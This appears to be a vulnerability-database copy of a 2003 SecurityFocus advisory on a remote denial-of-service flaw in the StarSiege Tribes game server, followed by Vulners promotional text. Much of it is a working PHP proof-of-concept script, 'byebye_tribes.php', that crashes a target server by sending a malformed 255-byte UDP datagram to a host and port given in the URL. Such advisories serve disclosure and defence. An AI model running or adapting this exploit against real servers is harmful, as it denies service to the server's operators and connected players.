source: http://www.securityfocus.com/bid/8184/info
StarSiege Tribes Game Server has been reported prone to a remotely triggered denial of service vulnerability.
The issue presents itself when the affected server receives and processes a malformed UDP datagram. Reportedly when the server handles a UDP datagram containing malformed data, an exception will be thrown and the StarSiege Tribes Game Server will crash. Service will be denied, to current connected users of the system.
<?php
/*
Author: st0ic <[email protected]>
Website: http://www.fsix.net/
Name: byebye_tribes.php
Original Date: 07/14/2003
Purpose: POC "StarSiege: Tribes" DoS
Usage: Call it from a browser once its uploaded on a server
with PHP installed:
http://host/byebye_tribes.php?host=127.0.0.1&port=28001
Note - global variables must be enabled in php.ini (yes... I
know thats bad too)
Stuff:
Yeah... too lazy to fine tune it, maybe someone else can
throw in HTML forms to give it a little interface ;-).
*/
$fp = fsockopen("udp://$host", $port, $errno, $errstr, 30);
if (!$fp)
{
echo "$errstr ($errno)<br>\n";
exit;
}
else
{
$char = "a";
for($a = 0; $a < 255; $a++)
$data = $data.$char;
if(fputs ($fp, $data) )
echo "successful<br>";
else
echo "error<br>";
}
?>
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation